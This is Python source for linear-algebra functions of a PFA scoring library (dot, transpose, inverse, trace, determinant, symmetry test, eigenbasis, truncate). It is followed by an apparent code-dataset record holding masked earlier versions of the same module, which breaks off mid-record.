                xmat = mapsToMatrix(x, rows, inter)
                ymat = mapsToMatrix(y, inter, cols)
                if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0] == 0 or ymat.shape[1] == 0:
                    raise PFARuntimeException("too few rows/cols", self.errcodeBase + 1, self.name, pos)
                if bad: raise PFARuntimeException("contains non-finite value", self.errcodeBase + 2, self.name, pos)
                return matrixToMaps(np().dot(xmat, ymat), rows, cols)
            else:
                # map matrix-vector case
                bad = any(any(math.isnan(z) or math.isinf(z) for z in list(row.values())) for row in list(x.values())) or \
                      any(math.isnan(z) or math.isinf(z) for z in list(y.values()))
                rows = list(rowKeys(x))
                cols = list(colKeys(x).union(rowKeys(y)))
                xmat = mapsToMatrix(x, rows, cols)
                ymat = mapToRowVector(y, cols)
                if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0] == 0 or ymat.shape[1] == 0:
                    raise PFARuntimeException("too few rows/cols", self.errcodeBase + 1, self.name, pos)
                if bad: raise PFARuntimeException("contains non-finite value", self.errcodeBase + 2, self.name, pos)
                return rowVectorToMap(np().dot(xmat, ymat), rows)
provide(Dot())
class Transpose(LibFcn):
    """PFA function ``la.transpose``: transpose of an array or map matrix.

    Raises errcodeBase + 0 if either dimension is empty and + 1 if the
    rows are ragged.  In the map form, missing cells are treated as 0.0,
    consistent with the other map-matrix functions in this module.
    """
    name = prefix + "transpose"
    sig = Sigs([Sig([{"x": P.Array(P.Array(P.Double()))}], P.Array(P.Array(P.Double()))),
                Sig([{"x": P.Map(P.Map(P.Double()))}], P.Map(P.Map(P.Double())))])
    errcodeBase = 24060
    def __call__(self, state, scope, pos, paramTypes, x):
        # Array-of-arrays representation.
        if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x):
            rows = len(x)
            if rows < 1:
                raise PFARuntimeException("too few rows/cols", self.errcodeBase + 0, self.name, pos)
            cols = len(x[0])
            if cols < 1:
                raise PFARuntimeException("too few rows/cols", self.errcodeBase + 0, self.name, pos)
            if raggedArray(x):
                raise PFARuntimeException("ragged columns", self.errcodeBase + 1, self.name, pos)
            return [[x[r][c] for r in range(rows)] for c in range(cols)]
        # Map-of-maps representation.
        elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())):
            rows = rowKeys(x)
            cols = colKeys(x)
            if len(rows) < 1 or len(cols) < 1:
                raise PFARuntimeException("too few rows/cols", self.errcodeBase + 0, self.name, pos)
            if raggedMap(x):
                raise PFARuntimeException("ragged columns", self.errcodeBase + 1, self.name, pos)
            # Use .get with a 0.0 default: raggedMap only compares row lengths,
            # so rows with equal length but different column keys would
            # otherwise raise an uncaught KeyError here.
            return dict((c, dict((r, x[r].get(c, 0.0)) for r in rows)) for c in cols)
provide(Transpose())
class Inverse(LibFcn):
    """PFA function ``la.inverse``: matrix inverse via numpy's ``.I``.

    Raises errcodeBase + 0 if either dimension is empty and + 1 if an
    array matrix is ragged.  For the map form, the result swaps row and
    column labels, since the inverse of a rows-by-cols matrix is
    cols-by-rows.
    """
    name = prefix + "inverse"
    sig = Sigs([Sig([{"x": P.Array(P.Array(P.Double()))}], P.Array(P.Array(P.Double()))),
                Sig([{"x": P.Map(P.Map(P.Double()))}], P.Map(P.Map(P.Double())))])
    errcodeBase = 24070
    def __call__(self, state, scope, pos, paramTypes, x):
        # Array-of-arrays representation.
        if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x):
            rows = len(x)
            if rows < 1:
                raise PFARuntimeException("too few rows/cols", self.errcodeBase + 0, self.name, pos)
            cols = len(x[0])
            if cols < 1:
                raise PFARuntimeException("too few rows/cols", self.errcodeBase + 0, self.name, pos)
            if raggedArray(x):
                raise PFARuntimeException("ragged columns", self.errcodeBase + 1, self.name, pos)
            return matrixToArrays(arraysToMatrix(x).I)
        # Map-of-maps representation; missing cells default to 0.0 in
        # mapsToMatrix.
        elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())):
            rows = list(rowKeys(x))
            cols = list(colKeys(x))
            if len(rows) < 1 or len(cols) < 1:
                raise PFARuntimeException("too few rows/cols", self.errcodeBase + 0, self.name, pos)
            xmat = mapsToMatrix(x, rows, cols)
            return matrixToMaps(xmat.I, cols, rows)
provide(Inverse())
class Trace(LibFcn):
    """PFA function ``la.trace``: sum of the diagonal of a matrix.

    An empty array matrix has trace 0.0; ragged array matrices raise
    errcodeBase + 0.  For the map form, the diagonal runs over keys that
    appear both as a row and as a column label, with missing cells
    treated as 0.0 (consistent with the other map-matrix functions in
    this module).
    """
    name = prefix + "trace"
    sig = Sigs([Sig([{"x": P.Array(P.Array(P.Double()))}], P.Double()),
                Sig([{"x": P.Map(P.Map(P.Double()))}], P.Double())])
    errcodeBase = 24080
    def __call__(self, state, scope, pos, paramTypes, x):
        # Array-of-arrays representation.
        if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x):
            rows = len(x)
            if rows == 0:
                return 0.0
            else:
                cols = len(x[0])
                if raggedArray(x):
                    raise PFARuntimeException("ragged columns", self.errcodeBase + 0, self.name, pos)
                return sum(x[i][i] for i in range(min(rows, cols)))
        # Map-of-maps representation.
        elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())):
            keys = rowKeys(x).intersection(colKeys(x))
            # Use .get with a 0.0 default: key i can be in the intersection
            # because column i appears in some *other* row, in which case
            # x[i][i] would raise an uncaught KeyError on a sparse map.
            return sum(x[i].get(i, 0.0) for i in keys)
provide(Trace())
class Det(LibFcn):
    """PFA function ``la.det``: determinant of a square matrix.

    Array matrices must be non-empty (errcodeBase + 0), non-ragged (+ 1)
    and square (+ 2).  Map matrices are densified over the union of row
    and column keys (always square), with missing cells as 0.0.  If any
    entry is NaN or infinite, NaN is returned instead of raising.
    """
    name = prefix + "det"
    sig = Sigs([Sig([{"x": P.Array(P.Array(P.Double()))}], P.Double()),
                Sig([{"x": P.Map(P.Map(P.Double()))}], P.Double())])
    errcodeBase = 24090
    def __call__(self, state, scope, pos, paramTypes, x):
        # Array-of-arrays representation.
        if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x):
            rows = len(x)
            if rows < 1:
                raise PFARuntimeException("too few rows/cols", self.errcodeBase + 0, self.name, pos)
            cols = len(x[0])
            if cols < 1:
                raise PFARuntimeException("too few rows/cols", self.errcodeBase + 0, self.name, pos)
            if raggedArray(x):
                raise PFARuntimeException("ragged columns", self.errcodeBase + 1, self.name, pos)
            if rows != cols:
                raise PFARuntimeException("non-square matrix", self.errcodeBase + 2, self.name, pos)
            if any(any(math.isnan(z) or math.isinf(z) for z in row) for row in x):
                return float("nan")
            else:
                return float(np().linalg.det(arraysToMatrix(x)))
        # Map-of-maps representation.
        elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())):
            keys = list(rowKeys(x).union(colKeys(x)))
            if len(keys) < 1 or all(len(row) == 0 for row in list(x.values())):
                raise PFARuntimeException("too few rows/cols", self.errcodeBase + 0, self.name, pos)
            if any(any(math.isnan(z) or math.isinf(z) for z in list(row.values())) for row in list(x.values())):
                return float("nan")
            else:
                return float(np().linalg.det(mapsToMatrix(x, keys, keys)))
provide(Det())
class Symmetric(LibFcn):
    """PFA function ``la.symmetric``: test whether a matrix equals its
    transpose within an absolute tolerance.

    Array matrices must be non-empty (errcodeBase + 0), non-ragged (+ 1)
    and square (+ 2).  Map matrices compare over the union of row and
    column keys, with missing cells treated as 0.0.
    """
    name = prefix + "symmetric"
    sig = Sigs([Sig([{"x": P.Array(P.Array(P.Double()))}, {"tol": P.Double()}], P.Boolean()),
                Sig([{"x": P.Map(P.Map(P.Double()))}, {"tol": P.Double()}], P.Boolean())])
    errcodeBase = 24100
    @staticmethod
    def same(x, y, tol):
        """Return True if x and y are equal within tol; infinities of the
        same sign match each other, and NaN matches NaN."""
        if math.isinf(x) and math.isinf(y) and ((x > 0.0 and y > 0.0) or (x < 0.0 and y < 0.0)):
            return True
        elif math.isnan(x) and math.isnan(y):
            return True
        elif not math.isinf(x) and not math.isnan(x) and not math.isinf(y) and not math.isnan(y):
            return abs(x - y) < tol
        else:
            return False
    def __call__(self, state, scope, pos, paramTypes, x, tol):
        # Array-of-arrays representation.
        if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x):
            rows = len(x)
            if rows < 1:
                raise PFARuntimeException("too few rows/cols", self.errcodeBase + 0, self.name, pos)
            cols = len(x[0])
            if cols < 1:
                raise PFARuntimeException("too few rows/cols", self.errcodeBase + 0, self.name, pos)
            if raggedArray(x):
                raise PFARuntimeException("ragged columns", self.errcodeBase + 1, self.name, pos)
            if rows != cols:
                raise PFARuntimeException("non-square matrix", self.errcodeBase + 2, self.name, pos)
            return all(all(self.same(x[i][j], x[j][i], tol) for j in range(cols)) for i in range(rows))
        # Map-of-maps representation; missing cells compare as 0.0.
        elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())):
            keys = list(rowKeys(x).union(colKeys(x)))
            if len(keys) < 1 or all(len(row) == 0 for row in list(x.values())):
                raise PFARuntimeException("too few rows/cols", self.errcodeBase + 0, self.name, pos)
            return all(all(self.same(x.get(i, {}).get(j, 0.0), x.get(j, {}).get(i, 0.0), tol) for j in keys) for i in keys)
provide(Symmetric())
class EigenBasis(LibFcn):
    """PFA function ``la.eigenBasis``: eigenvector basis of a (symmetrized)
    matrix, with each basis vector scaled by 1/sqrt(|eigenvalue|) — a
    whitening-style transformation.

    Array matrices must be non-empty (errcodeBase + 0), non-ragged (+ 1),
    square (+ 2) and finite (+ 3).  For the map form, the result's row
    labels are the strings "0", "1", ... in basis order.
    """
    name = prefix + "eigenBasis"
    sig = Sigs([Sig([{"x": P.Array(P.Array(P.Double()))}], P.Array(P.Array(P.Double()))),
                Sig([{"x": P.Map(P.Map(P.Double()))}], P.Map(P.Map(P.Double())))])
    errcodeBase = 24110
    def calculate(self, x, size):
        """Compute the scaled eigenbasis of the size-by-size matrix x."""
        # Symmetrize to guard against small asymmetries in the input.
        symm = (x + x.T) * 0.5
        evals, evects = np().linalg.eig(symm)
        evects = np().array(evects)
        # Normalize each eigenvector's sign so its first component is >= 0.
        evects2 = [evects[:,i] * (-1.0 if evects[0,i] < 0.0 else 1.0) for i in range(size)]
        # Scale factors 1/sqrt(|eigenvalue|); div() guards division by zero.
        eigvalm2 = [div(1.0, math.sqrt(abs(ei))) for ei in evals]
        # Order basis vectors by increasing scale (decreasing |eigenvalue|).
        order = np().argsort(eigvalm2)
        out = np().empty((size, size), dtype=np().double)
        for i in range(size):
            for j in range(size):
                out[i,j] = evects2[order[i]][j] * eigvalm2[order[i]]
        return out
    def __call__(self, state, scope, pos, paramTypes, x):
        # Array-of-arrays representation.
        if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x):
            rows = len(x)
            if rows < 1:
                raise PFARuntimeException("too few rows/cols", self.errcodeBase + 0, self.name, pos)
            cols = len(x[0])
            if cols < 1:
                raise PFARuntimeException("too few rows/cols", self.errcodeBase + 0, self.name, pos)
            if raggedArray(x):
                raise PFARuntimeException("ragged columns", self.errcodeBase + 1, self.name, pos)
            if rows != cols:
                raise PFARuntimeException("non-square matrix", self.errcodeBase + 2, self.name, pos)
            if any(any(math.isnan(z) or math.isinf(z) for z in row) for row in x):
                raise PFARuntimeException("non-finite matrix", self.errcodeBase + 3, self.name, pos)
            return matrixToArrays(self.calculate(arraysToMatrix(x), rows))
        # Map-of-maps representation; densified over the union of keys.
        elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())):
            keys = list(rowKeys(x).union(colKeys(x)))
            if len(keys) < 1 or all(len(z) == 0 for z in list(x.values())):
                raise PFARuntimeException("too few rows/cols", self.errcodeBase + 0, self.name, pos)
            if any(any(math.isnan(z) or math.isinf(z) for z in list(row.values())) for row in list(x.values())):
                raise PFARuntimeException("non-finite matrix", self.errcodeBase + 3, self.name, pos)
            return matrixToMaps(self.calculate(mapsToMatrix(x, keys, keys), len(keys)), list(map(str, range(len(keys)))), keys)
provide(EigenBasis())
class Truncate(LibFcn):
    """PFA function ``la.truncate``: keep only a subset of a matrix's rows.

    For array matrices, ``keep`` is an int and the first ``keep`` rows
    are kept (negative values are clamped to 0).  For map matrices,
    ``keep`` is an array of row labels and only those rows are kept.
    Raises errcodeBase + 0 for empty dimensions and + 1 for ragged
    array rows.
    """
    name = prefix + "truncate"
    sig = Sigs([Sig([{"x": P.Array(P.Array(P.Double()))}, {"keep": P.Int()}], P.Array(P.Array(P.Double()))),
                Sig([{"x": P.Map(P.Map(P.Double()))}, {"keep": P.Array(P.String())}], P.Map(P.Map(P.Double())))])
    errcodeBase = 24120
    def __call__(self, state, scope, pos, paramTypes, x, keep):
        # Clamp a negative row count to zero (array form only).
        if isinstance(keep, int) and keep < 0:
            keep = 0
        # Array-of-arrays representation: slice off the first `keep` rows.
        if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x):
            rows = len(x)
            if rows < 1:
                raise PFARuntimeException("too few rows/cols", self.errcodeBase + 0, self.name, pos)
            cols = len(x[0])
            if cols < 1:
                raise PFARuntimeException("too few rows/cols", self.errcodeBase + 0, self.name, pos)
            if raggedArray(x):
                raise PFARuntimeException("ragged columns", self.errcodeBase + 1, self.name, pos)
            return x[:keep]
        # Map-of-maps representation: keep rows whose label is in `keep`.
        elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())):
            rows = rowKeys(x)
            cols = colKeys(x)
            if len(rows) < 1 or len(cols) < 1:
                raise PFARuntimeException("too few rows/cols", self.errcodeBase + 0, self.name, pos)
            return dict((k, x[k]) for k in rows if k in keep)
provide(Truncate())
|
normal
|
{
"blob_id": "780dc49c3eaef3fb25ca0aac760326b1c3adc633",
"index": 6002,
"step-1": "<mask token>\n\n\nclass Dot(LibFcn):\n name = prefix + 'dot'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}, {'y': P.Array(P.\n Double())}], P.Array(P.Double())), Sig([{'x': P.Map(P.Map(P.Double(\n )))}, {'y': P.Map(P.Double())}], P.Map(P.Double())), Sig([{'x': P.\n Array(P.Array(P.Double()))}, {'y': P.Array(P.Array(P.Double()))}],\n P.Array(P.Array(P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()))},\n {'y': P.Map(P.Map(P.Double()))}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24050\n\n def __call__(self, state, scope, pos, paramTypes, x, y):\n if paramTypes[1]['type'] == 'array':\n if isinstance(paramTypes[1]['items'], dict) and paramTypes[1][\n 'items']['type'] == 'array':\n bad = any(any(math.isnan(z) or math.isinf(z) for z in row) for\n row in x) or any(any(math.isnan(z) or math.isinf(z) for\n z in row) for row in y)\n xmat = arraysToMatrix(x)\n ymat = arraysToMatrix(y)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0\n ] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 1, self.name, pos)\n try:\n if bad:\n raise PFARuntimeException('contains non-finite value',\n self.errcodeBase + 2, self.name, pos)\n return matrixToArrays(np().dot(xmat, ymat))\n except ValueError:\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n else:\n bad = any(any(math.isnan(z) or math.isinf(z) for z in row) for\n row in x) or any(math.isnan(z) or math.isinf(z) for z in y)\n xmat = arraysToMatrix(x)\n ymat = arrayToRowVector(y)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0\n ] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 1, self.name, pos)\n try:\n if bad:\n raise PFARuntimeException('contains non-finite value',\n self.errcodeBase + 2, self.name, pos)\n return rowVectorToArray(np().dot(xmat, ymat))\n except ValueError:\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, 
self.name, pos)\n elif paramTypes[1]['type'] == 'map':\n if isinstance(paramTypes[1]['values'], dict) and paramTypes[1][\n 'values']['type'] == 'map':\n bad = any(any(math.isnan(z) or math.isinf(z) for z in list(\n row.values())) for row in list(x.values())) or any(any(\n math.isnan(z) or math.isinf(z) for z in list(row.values\n ())) for row in list(y.values()))\n rows = list(rowKeys(x))\n inter = list(colKeys(x).union(rowKeys(y)))\n cols = list(colKeys(y))\n xmat = mapsToMatrix(x, rows, inter)\n ymat = mapsToMatrix(y, inter, cols)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0\n ] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 1, self.name, pos)\n if bad:\n raise PFARuntimeException('contains non-finite value', \n self.errcodeBase + 2, self.name, pos)\n return matrixToMaps(np().dot(xmat, ymat), rows, cols)\n else:\n bad = any(any(math.isnan(z) or math.isinf(z) for z in list(\n row.values())) for row in list(x.values())) or any(math\n .isnan(z) or math.isinf(z) for z in list(y.values()))\n rows = list(rowKeys(x))\n cols = list(colKeys(x).union(rowKeys(y)))\n xmat = mapsToMatrix(x, rows, cols)\n ymat = mapToRowVector(y, cols)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0\n ] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 1, self.name, pos)\n if bad:\n raise PFARuntimeException('contains non-finite value', \n self.errcodeBase + 2, self.name, pos)\n return rowVectorToMap(np().dot(xmat, ymat), rows)\n\n\n<mask token>\n\n\nclass Transpose(LibFcn):\n name = prefix + 'transpose'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Array(P.Array(\n P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()))}], P.Map(P.Map(P\n .Double())))])\n errcodeBase = 24060\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n 
raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n return [[x[r][c] for r in range(rows)] for c in range(cols)]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n rows = rowKeys(x)\n cols = colKeys(x)\n if len(rows) < 1 or len(cols) < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedMap(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n return dict((c, dict((r, x[r][c]) for r in rows)) for c in cols)\n\n\n<mask token>\n\n\nclass Inverse(LibFcn):\n name = prefix + 'inverse'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Array(P.Array(\n P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()))}], P.Map(P.Map(P\n .Double())))])\n errcodeBase = 24070\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n return matrixToArrays(arraysToMatrix(x).I)\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n rows = list(rowKeys(x))\n cols = list(colKeys(x))\n if len(rows) < 1 or len(cols) < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n xmat = mapsToMatrix(x, rows, cols)\n return matrixToMaps(xmat.I, cols, rows)\n\n\n<mask token>\n\n\nclass 
Trace(LibFcn):\n name = prefix + 'trace'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Double()), Sig\n ([{'x': P.Map(P.Map(P.Double()))}], P.Double())])\n errcodeBase = 24080\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows == 0:\n return 0.0\n else:\n cols = len(x[0])\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 0, self.name, pos)\n return sum(x[i][i] for i in range(min(rows, cols)))\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n keys = rowKeys(x).intersection(colKeys(x))\n return sum(x[i][i] for i in keys)\n\n\n<mask token>\n\n\nclass Det(LibFcn):\n name = prefix + 'det'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Double()), Sig\n ([{'x': P.Map(P.Map(P.Double()))}], P.Double())])\n errcodeBase = 24090\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n if rows != cols:\n raise PFARuntimeException('non-square matrix', self.\n errcodeBase + 2, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in row) for row in\n x):\n return float('nan')\n else:\n return float(np().linalg.det(arraysToMatrix(x)))\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n keys = list(rowKeys(x).union(colKeys(x)))\n if len(keys) < 1 or all(len(row) == 0 for row in list(x.values())):\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, 
self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in list(row.\n values())) for row in list(x.values())):\n return float('nan')\n else:\n return float(np().linalg.det(mapsToMatrix(x, keys, keys)))\n\n\n<mask token>\n\n\nclass Symmetric(LibFcn):\n name = prefix + 'symmetric'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}, {'tol': P.Double(\n )}], P.Boolean()), Sig([{'x': P.Map(P.Map(P.Double()))}, {'tol': P.\n Double()}], P.Boolean())])\n errcodeBase = 24100\n\n @staticmethod\n def same(x, y, tol):\n if math.isinf(x) and math.isinf(y) and (x > 0.0 and y > 0.0 or x < \n 0.0 and y < 0.0):\n return True\n elif math.isnan(x) and math.isnan(y):\n return True\n elif not math.isinf(x) and not math.isnan(x) and not math.isinf(y\n ) and not math.isnan(y):\n return abs(x - y) < tol\n else:\n return False\n\n def __call__(self, state, scope, pos, paramTypes, x, tol):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n if rows != cols:\n raise PFARuntimeException('non-square matrix', self.\n errcodeBase + 2, self.name, pos)\n return all(all(self.same(x[i][j], x[j][i], tol) for j in range(\n cols)) for i in range(rows))\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n keys = list(rowKeys(x).union(colKeys(x)))\n if len(keys) < 1 or all(len(row) == 0 for row in list(x.values())):\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n return all(all(self.same(x.get(i, {}).get(j, 0.0), x.get(j, {})\n .get(i, 0.0), tol) for j in keys) for i in keys)\n\n\n<mask token>\n\n\nclass EigenBasis(LibFcn):\n 
name = prefix + 'eigenBasis'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Array(P.Array(\n P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()))}], P.Map(P.Map(P\n .Double())))])\n errcodeBase = 24110\n\n def calculate(self, x, size):\n symm = (x + x.T) * 0.5\n evals, evects = np().linalg.eig(symm)\n evects = np().array(evects)\n evects2 = [(evects[:, i] * (-1.0 if evects[0, i] < 0.0 else 1.0)) for\n i in range(size)]\n eigvalm2 = [div(1.0, math.sqrt(abs(ei))) for ei in evals]\n order = np().argsort(eigvalm2)\n out = np().empty((size, size), dtype=np().double)\n for i in range(size):\n for j in range(size):\n out[i, j] = evects2[order[i]][j] * eigvalm2[order[i]]\n return out\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n if rows != cols:\n raise PFARuntimeException('non-square matrix', self.\n errcodeBase + 2, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in row) for row in\n x):\n raise PFARuntimeException('non-finite matrix', self.\n errcodeBase + 3, self.name, pos)\n return matrixToArrays(self.calculate(arraysToMatrix(x), rows))\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n keys = list(rowKeys(x).union(colKeys(x)))\n if len(keys) < 1 or all(len(z) == 0 for z in list(x.values())):\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in list(row.\n values())) for row in list(x.values())):\n raise PFARuntimeException('non-finite matrix', self.\n errcodeBase + 3, 
self.name, pos)\n return matrixToMaps(self.calculate(mapsToMatrix(x, keys, keys),\n len(keys)), list(map(str, range(len(keys)))), keys)\n\n\n<mask token>\n\n\nclass Truncate(LibFcn):\n name = prefix + 'truncate'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}, {'keep': P.Int()}\n ], P.Array(P.Array(P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()\n ))}, {'keep': P.Array(P.String())}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24120\n\n def __call__(self, state, scope, pos, paramTypes, x, keep):\n if isinstance(keep, int) and keep < 0:\n keep = 0\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n return x[:keep]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n rows = rowKeys(x)\n cols = colKeys(x)\n if len(rows) < 1 or len(cols) < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n return dict((k, x[k]) for k in rows if k in keep)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef matrixToMaps(x, rows, cols):\n return dict((row, dict(list(zip(cols, xi)))) for row, xi in zip(rows, x\n .tolist()))\n\n\n<mask token>\n\n\nclass MapApply(LibFcn):\n name = prefix + 'map'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}, {'fcn': P.Fcn([P.\n Double()], P.Double())}], P.Array(P.Array(P.Double()))), Sig([{'x':\n P.Map(P.Map(P.Double()))}, {'fcn': P.Fcn([P.Double()], P.Double())}\n ], P.Map(P.Map(P.Double())))])\n errcodeBase = 24000\n\n def __call__(self, state, scope, pos, paramTypes, x, fcn):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n return [[callfcn(state, scope, fcn, [xj]) for xj in xi] for xi in x\n ]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n return dict((i, dict((j, callfcn(state, scope, fcn, [xj])) for \n j, xj in list(xi.items()))) for i, xi in list(x.items()))\n\n\n<mask token>\n\n\nclass Scale(LibFcn):\n name = prefix + 'scale'\n sig = Sigs([Sig([{'x': P.Array(P.Double())}, {'alpha': P.Double()}], P.\n Array(P.Double())), Sig([{'x': P.Array(P.Array(P.Double()))}, {\n 'alpha': P.Double()}], P.Array(P.Array(P.Double()))), Sig([{'x': P.\n Map(P.Double())}, {'alpha': P.Double()}], P.Map(P.Double())), Sig([\n {'x': P.Map(P.Map(P.Double()))}, {'alpha': P.Double()}], P.Map(P.\n Map(P.Double())))])\n errcodeBase = 24010\n\n def __call__(self, state, scope, pos, paramTypes, x, alpha):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n return [[(xj * alpha) for xj in xi] for xi in x]\n elif isinstance(x, (list, tuple)):\n return [(xi * alpha) for xi in x]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in x):\n return dict((i, dict((j, xj * alpha) for j, xj in list(xi.items\n ()))) for i, xi in list(x.items()))\n else:\n return dict((i, xi * alpha) for i, xi in list(x.items()))\n\n\n<mask token>\n\n\nclass ZipMap(LibFcn):\n name = prefix + 'zipmap'\n sig = 
